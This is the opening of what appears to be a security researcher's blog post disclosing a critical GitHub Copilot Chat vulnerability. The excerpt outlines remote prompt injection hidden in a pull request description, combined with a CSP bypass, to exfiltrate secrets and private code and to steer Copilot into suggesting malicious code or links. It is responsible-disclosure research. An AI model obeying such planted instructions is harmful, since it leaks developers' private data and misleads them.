Get details on our discovery of a critical vulnerability in GitHub Copilot Chat.
TL;DR:
In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.
The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.
Background
GitHub Copilot Chat is an AI assistant built into GitHub that helps developers by answering questions, explaining code, and suggesting implementations directly in their workflow.
Copilot Chat is context-aware: it can use information from the repository (such as code, commits, or pull requests) to provide tailored answers.
As always, more context = more attack surface.
Finding the prompt injection
As mentioned earlier, GitHub Copilot is context-aware - so I set out to make it notice me. To do this, I embedded a prompt directed at Copilot inside a pull request description.
... continue reading